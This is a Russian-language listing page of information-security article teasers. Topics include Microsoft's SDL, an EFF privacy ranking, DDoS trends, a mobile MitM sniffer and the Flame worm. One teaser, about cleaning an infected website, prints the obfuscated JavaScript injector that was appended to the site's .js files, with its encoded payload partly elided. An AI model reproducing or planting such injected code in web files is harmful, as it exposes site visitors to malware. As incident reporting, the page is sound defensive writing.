Рубрика «информационная безопасность» - 922

Дорогие читатели!

Хотим поделиться с вами рассказом Стива Липнера, старшего директора по направлению стратегического планирования и разработки технологий обеспечения безопасности корпорации Microsoft, который принял участие в конференции Security Development Conference 2012 в Вашингтоне 16 мая 2012:

«Этим утром, в Вашингтоне, я участвовал в Security Development Conference 2012, слушая различные мнения людей из компаний, государственных структур и академических организаций, которые делились своим опытом по адаптации безопасного цикла разработки (Security Development Lifecycle). После пленарного заседания и некоторых посещенных мной сессий, сегодня я видел выступление Скота Чарни, которое напомнило мне ранние дни, когда Microsoft вместе со своими заказчиками столкнулись с угрозами безопасности, которые поменяли доверие к продуктам и сервисам. Создание SDL было важным шагом в борьбе с этими угрозами и на текущий момент SDL продолжает помогать снижать число и серьезность уязвимостей, найденных в продуктах Microsoft.
Читать полностью »

EFF (Electronic Frontier Foundation, борется за права пользователей и неприкосновенность пользовательских данных в Сети) опубликовало свой отчет, показывающий, как крупные компании защищают права своих пользователей.

Худшие результаты — Microsoft, Skype, Apple.
Лучшие — Dropbox, Twitter, Sonic (Sonic.net, калифорнийский провайдер).

Под катом — рейтинг 18 компаний + некоторые расшифровки.

Читать полностью »

Прочёл на сайте журнала «Хакер» две статьи:

Читать полностью »

Простой метод хранения паролей в голове

Я регистрируюсь в среднем, на одном сайте в неделю и мне, как и остальным, необходимо постоянно придумывать и главное помнить свои пароли. Сначала я придумал сложный пароль и забивал его на всех доменах где регистрировался, но потом понял, что это не далеко не безопасный подход, так как при взломе одного аккаунта, ты рискуешь потерять все остальные. Поэтому было принято решение хранить разные пароли для разных доменов.
Читать полностью »

Отчетная статья по семинару «DDoS-атаки и защита от них» (RIGF, 14 мая 2012, Москва)

Спикер: Артем Гавриченков, ведущий разработчик сети фильтрации трафика Qrator
Тема доклада: DDoS-атаки в 2011-2012 гг.: характер и тенденции

Приведем обзор DDoS-атак за последние полтора года и поговорим о том, чего следует бояться, а чего нет. Начнем с тривиальной статистики, данные которой основаны на клиентской базе HLL: к сожалению, ни одна компания не имеет универсального всевидящего ока. Итак, за 2011-2012 гг. мы стали очевидцами более 2 500 DDoS-атак.

Обзор DDoS атак Рунета: 9:1 в пользу примитива

Читать полностью »

Однажды, я получил письмо от Яндекс.Вебмастер о том, что один из моих сайтов заражён — Сайт содержит код, который может быть опасен для посетителей и, что В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Быстрый анализ показал, что заражены файлы *.js — в конце каждого из них был добавлен код:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}

Проанализировав выдачу поисковика на тему поиска и замены текста в файлах linux, я получил несколько вариантов команд для консоли.

Далее, я зашёл в систему по SSH и от имени root выполнил команду Читать полностью »

С такой инициативой выступил глава подкомитета Госдумы по информационной политике, информационным технологиям и связи Сергей Железняк. По его мнению "Интернет обладает значительной мобилизующей силой, в том числе и деструктивной", поэтому "меры по обеспечению информационной безопасности должны носить трансграничный характер, поскольку само распространение информации в сети не ограничено территорией страны и осуществляется мгновенно по всему миру".
Читать полностью »

Меня в Гугле забанили
Читать полностью »

Про MiTM на айфонах и андроидах уже были соответствующие посты.
К упомянутым инструментам добавился еще один, так сказать специализированный.

Была создана консольная версия снифера Intercepter-NG и она же портирована под unix-like
операционные системы, вклюая IOS и Android.

image

Читать полностью »

Вы уже слышали про Flame? Присаживайтесь поудобнее, сейчас мы предоставим вам все подробности.

Вирусы Duqu и Stuxnet повысили градус кибервойны на Ближнем Востоке, однако недавно мы обнаружили, пожалуй, самое изощренное кибероружие на сегодняшний день. Червь Flame, созданный для кибершпионажа, попал в поле зрения экспертов «Лаборатории Касперского» при проведении исследования по запросу Международного союза электросвязи (МСЭ), обратившегося к нам за содействием в поиске неизвестной вредоносной программы, которая удаляла конфиденциальные данные с компьютеров, расположенных в странах Ближнего Востока. В процессе поиска этой программы, получившей название Wiper, мы обнаружили новый образец вредоносного ПО, который был назван Worm.Win32.Flame.

image
Семь стран, подвергшихся наибольшему количеству атакЧитать полностью »


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js